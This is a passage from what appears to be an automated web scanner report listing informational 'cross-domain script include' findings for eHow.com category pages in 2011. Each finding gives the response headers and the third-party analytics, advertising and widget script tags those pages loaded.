...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.440. http://www.ehow.com/culture-and-society/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/culture-and-society/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71953

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Culture & Society - How To Information | eHow.com
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.441. http://www.ehow.com/diseases-and-conditions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/diseases-and-conditions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:57 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71258

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Diseases & Conditions - How To Information | eHow
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.442. http://www.ehow.com/drugs-and-supplements/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/drugs-and-supplements/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72766

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Drugs & Supplements - How To Information | eHow.c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.443. http://www.ehow.com/education/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/education/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75099

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Education - How To Information | eHow.com</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.444. http://www.ehow.com/ehow-family/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-family/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44981

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Family | eHow.com
</title>
       <meta charset
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.445. http://www.ehow.com/ehow-food/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-food/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46042

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Food | eHow.com
</title>
       <meta charset="
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.446. http://www.ehow.com/ehow-health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-health/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43215

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Health | eHow.com
</title>
       <meta charset
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.447. http://www.ehow.com/ehow-home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-home/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45008

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Home | eHow.com
</title>
       <meta charset="
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.448. http://www.ehow.com/ehow-mobile.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-mobile.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:40 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24767

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Mobile | "How to do Almost Everything" by Ce
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.449. http://www.ehow.com/ehow-money/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-money/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46695

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Money | eHow.com
</title>
       <meta charset=
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.450. http://www.ehow.com/ehow-style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-style/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45211

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Style | eHow.com
</title>
       <meta charset=
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.451. http://www.ehow.com/ehow-tax-time/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/ehow-tax-time/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:11:46 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43093

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>eHow Tax Time | eHow.com
</title>
       <meta chars
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/channel-x06mpw.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/channel-vK3Wfg.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.452. http://www.ehow.com/electronics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/electronics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70768

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Electronics - How To Information | eHow.com</titl
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.453. http://www.ehow.com/family-health/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/family-health/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71867

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Family Health - How To Information | eHow.com</ti
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.454. http://www.ehow.com/fashion-and-style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/fashion-and-style/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71799

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Fashion & Style - How To Information | eHow.com</
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.455. http://www.ehow.com/fitness/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/fitness/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:23 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71773

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Fitness - How To Information | eHow.com</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.456. http://www.ehow.com/flu-season/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/flu-season/

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63662

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Flu Season - eHow.com</title>
       <meta charset="U
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>


<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/topic-v2-4LSRhA.css"/>

<script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/twitter-search-YOlODg.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.457. http://www.ehow.com/food-and-drink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/food-and-drink/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:12:22 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73297

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Food & Drink - How To Information | eHow.com</tit
...[SNIP]...
</style>
